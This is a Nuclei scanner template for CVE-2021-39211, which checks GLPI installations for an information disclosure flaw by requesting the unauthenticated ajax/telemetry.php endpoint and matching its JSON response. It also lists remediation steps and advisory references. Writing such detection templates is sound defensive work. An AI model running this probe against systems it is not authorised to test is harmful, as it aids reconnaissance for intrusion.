nuclei-templates/http/cves/2021/CVE-2021-39211.yaml

46 lines
1.6 KiB
YAML

id: CVE-2021-39211
info:
name: GLPI 9.2/<9.5.6 - Information Disclosure
author: dogasantos,noraj
severity: medium
description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions.
reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825
- https://github.com/glpi-project/glpi/releases/tag/9.5.6
- https://nvd.nist.gov/vuln/detail/CVE-2021-39211
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-39211
cwe-id: CWE-200,NVD-CWE-noinfo
epss-score: 0.00232
epss-percentile: 0.61151
cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: glpi-project
product: glpi
tags: cve,cve2021,glpi,exposure
http:
- method: GET
path:
- "{{BaseURL}}/ajax/telemetry.php"
- "{{BaseURL}}/glpi/ajax/telemetry.php"
matchers-condition: and
matchers:
- type: word
words:
- '"uuid":'
- '"glpi":'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100d06a086da21d0d2aaf2d01ed1951050970ef1e765013129c6264789d7a5e72f0022003fda1a69362c234711652688f670811ec8d88b81d5cae5dd5a1fdf8b3440085:922c64590222798bb761d5b6d8e72950